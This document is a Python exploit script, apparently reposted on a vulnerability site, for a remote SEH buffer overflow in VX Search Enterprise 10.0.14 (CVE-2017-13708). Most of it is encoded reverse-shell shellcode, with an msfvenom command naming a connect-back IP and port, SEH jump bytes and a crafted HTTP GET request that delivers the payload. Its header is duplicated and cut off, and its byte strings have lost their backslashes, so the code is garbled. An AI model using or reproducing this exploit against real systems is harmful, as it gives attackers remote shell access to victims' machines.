#!/usr/bin/env python
# Exploit Title : VX Search Enterprise v10.0.14 Remote Buffer Overflow [CVE-2017-13708]
# Discovery by : Anurag Srivastava and Nipun Jaswal
# Cr #!/usr/bin/env python
# Exploit Title : VX Search Enterprise v10.0.14 Remote Buffer Overflow [CVE-2017-13708]
# Discovery by : Anurag Srivastava and Nipun Jaswal
# Credtis : Team Pyramid
# Email : anurag.srivastava@pyramidcyber.com
# Website : www.pyramidcyber.com
# Discovery Date : 26/08/2017
# Software Link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.0.14.exe
# Tested Version : 10.0.14
# Tested on OS : Windows 7 Ultimate x64bit
# Category : Windows Remote Exploit
# CVE : CVE-2017-13708
# Steps to Reproduce: Go to VX Search Software -> Options -> Server -> Check the box Enable Web Server on Port 8082 . Run the python Script to get reverse shell .
import socket,sys
target = "127.0.0.1"
port = 8082
#msfvenom -p windows/shell_reverse_tcp LHOST=185.92.223.120 LPORT=4443 EXITFUN=none -e x86/alpha_mixed -f python
buf = ""
buf += "x89xe3xdaxdexd9x73xf4x5bx53x59x49x49x49"
buf += "x49x49x49x49x49x49x49x43x43x43x43x43x43"
buf += "x37x51x5ax6ax41x58x50x30x41x30x41x6bx41"
buf += "x41x51x32x41x42x32x42x42x30x42x42x41x42"
buf += "x58x50x38x41x42x75x4ax49x4bx4cx4dx38x6d"
buf += "x52x35x50x37x70x65x50x71x70x6bx39x4dx35"
buf += "x70x31x4bx70x63x54x6cx4bx56x30x76x50x4c"
buf += "x4bx63x62x76x6cx4cx4bx50x52x76x74x4cx4b"
buf += "x42x52x36x48x34x4fx58x37x51x5ax37x56x46"
buf += "x51x79x6fx6ex4cx55x6cx31x71x51x6cx67x72"
buf += "x34x6cx51x30x59x51x48x4fx36x6dx65x51x79"
buf += "x57x59x72x6bx42x72x72x72x77x4cx4bx52x72"
buf += "x76x70x6cx4bx61x5ax77x4cx6ex6bx42x6cx66"
buf += "x71x50x78x6ax43x32x68x75x51x6bx61x36x31"
buf += "x4ex6bx70x59x47x50x75x51x7ax73x4cx4bx30"
buf += "x49x66x78x79x73x64x7ax73x79x6cx4bx45x64"
buf += "x4cx4bx36x61x7ax76x50x31x6bx4fx4ex4cx4f"
buf += "x31x7ax6fx36x6dx43x31x39x57x74x78x6bx50"
buf += "x31x65x6bx46x43x33x53x4dx68x78x77x4bx33"
buf += "x4dx31x34x44x35x78x64x56x38x6ex6bx36x38"
buf += "x75x74x56x61x78x53x65x36x4ex6bx66x6cx30"
buf += "x4bx6ex6bx33x68x65x4cx63x31x68x53x6cx4b"
buf += "x65x54x4ex6bx33x31x58x50x6ex69x43x74x31"
buf += "x34x65x74x53x6bx71x4bx71x71x46x39x72x7a"
buf += "x53x61x39x6fx49x70x43x6fx61x4fx61x4ax4e"
buf += "x6bx44x52x78x6bx6ex6dx33x6dx33x58x75x63"
buf += "x50x32x35x50x37x70x32x48x54x37x70x73x34"
buf += "x72x63x6fx66x34x62x48x52x6cx52x57x44x66"
buf += "x43x37x39x6fx79x45x4cx78x4ex70x43x31x45"
buf += "x50x57x70x34x69x6fx34x51x44x70x50x53x58"
buf += "x76x49x6fx70x50x6bx33x30x79x6fx5ax75x50"
buf += "x50x46x30x42x70x46x30x51x50x62x70x67x30"
buf += "x70x50x30x68x79x7ax56x6fx69x4fx49x70x69"
buf += "x6fx48x55x6fx67x52x4ax36x65x75x38x68x39"
buf += "x33x6cx6bx6fx74x38x52x48x43x32x57x70x44"
buf += "x51x71x4bx4cx49x4bx56x31x7ax72x30x56x36"
buf += "x50x57x63x58x6dx49x6dx75x34x34x63x51x79"
buf += "x6fx4bx65x6cx45x6bx70x43x44x36x6cx69x6f"
buf += "x72x6ex76x68x52x55x48x6cx52x48x78x70x6c"
buf += "x75x6fx52x52x76x4bx4fx4ex35x42x48x43x53"
buf += "x50x6dx35x34x63x30x6ex69x4dx33x62x77x43"
buf += "x67x56x37x75x61x39x66x42x4ax62x32x31x49"
buf += "x70x56x69x72x39x6dx72x46x59x57x51x54x45"
buf += "x74x77x4cx33x31x46x61x4ex6dx37x34x57x54"
buf += "x56x70x68x46x47x70x62x64x36x34x46x30x61"
buf += "x46x36x36x62x76x70x46x72x76x32x6ex61x46"
buf += "x30x56x56x33x70x56x73x58x53x49x48x4cx55"
buf += "x6fx4fx76x49x6fx4ax75x4fx79x39x70x52x6e"
buf += "x72x76x37x36x4bx4fx56x50x61x78x65x58x4e"
buf += "x67x57x6dx75x30x39x6fx59x45x6fx4bx78x70"
buf += "x4dx65x4ex42x71x46x71x78x6ex46x6cx55x4f"
buf += "x4dx6fx6dx79x6fx59x45x35x6cx53x36x53x4c"
buf += "x54x4ax4dx50x6bx4bx4bx50x54x35x65x55x6d"
buf += "x6bx63x77x55x43x43x42x32x4fx63x5ax43x30"
buf += "x72x73x4bx4fx48x55x41x41"
payload = buf
payload += 'A' * (2492 - len(payload))
payload += 'xEBx10x90x90' # NSEH: First Short JMP
payload += 'x48xAEx13x10' # SEH : libpal.dll new 1013AE48
payload += 'x90' * 10
payload += 'xE9x25xBFxFFxFF' # Second JMP to ShellCode
payload += 'D' * (5000-len(payload))
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((target,port))
print "[*] Connection Success."
except:
print "Connction Refused %s:%s" %(target,port)
sys.exit(2)
packet = "GET /../%s HTTP/1.1
" %payload
packet += "Referer: http://pyramidcyber.com.com
"
packet += "
"
print "[*] ENJOY ! ;) "
s.send(packet)
s.close()
VX Search Enterprise 10.0.14 Buffer Overflow
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 472